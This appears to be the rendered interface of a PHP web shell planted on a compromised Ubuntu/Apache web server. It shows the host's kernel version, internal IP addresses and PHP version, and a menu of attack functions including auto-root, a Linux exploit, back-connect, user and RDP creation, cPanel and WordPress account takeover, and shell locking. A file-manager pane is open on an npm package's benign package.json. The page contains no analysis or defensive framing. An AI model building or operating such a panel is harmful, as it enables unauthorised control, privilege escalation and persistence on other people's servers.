Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
aria-hidden /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxr-x
LICENSE
1.05
KB
-rw-rw-r--
README.md
2.8
KB
-rw-rw-r--
package.json
1.79
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "aria-hidden", "version": "1.2.3", "description": "Cast aria-hidden to everything, except...", "main": "dist/es5/index.js", "sideEffects": false, "scripts": { "test": "jest", "dev": "lib-builder dev", "test:ci": "jest --runInBand --coverage", "build": "lib-builder build && yarn size:report", "prepublish": "yarn build", "release": "yarn build && yarn test", "lint": "lib-builder lint", "format": "lib-builder format", "size": "npx size-limit", "size:report": "npx size-limit --json > .size.json", "update": "lib-builder update", "prepublish-only": "yarn build && yarn changelog", "prepare": "husky install", "changelog": "conventional-changelog -p angular -i CHANGELOG.md -s", "changelog:rewrite": "conventional-changelog -p angular -i CHANGELOG.md -s -r 0" }, "author": "Anton Korzunov <thekashey@gmail.com>", "license": "MIT", "devDependencies": { "@theuiteam/lib-builder": "^0.2.1", "@size-limit/preset-small-lib": "^2.1.6" }, "engines": { "node": ">=10" }, "jsnext:main": "dist/es2015/index.js", "module": "dist/es2015/index.js", "types": "dist/es5/index.d.ts", "files": [ "dist" ], "keywords": [ "DOM", "aria", "hidden", "inert" ], "homepage": "https://github.com/theKashey/aria-hidden#readme", "repository": { "type": "git", "url": "git+https://github.com/theKashey/aria-hidden.git" }, "dependencies": { "tslib": "^2.0.0" }, "module:es2019": "dist/es2019/index.js", "lint-staged": { "*.{ts,tsx}": [ "prettier --write", "eslint --fix" ], "*.{js,css,json,md}": [ "prettier --write" ] }, "prettier": { "printWidth": 120, "trailingComma": "es5", "tabWidth": 2, "semi": true, "singleQuote": true } }
Close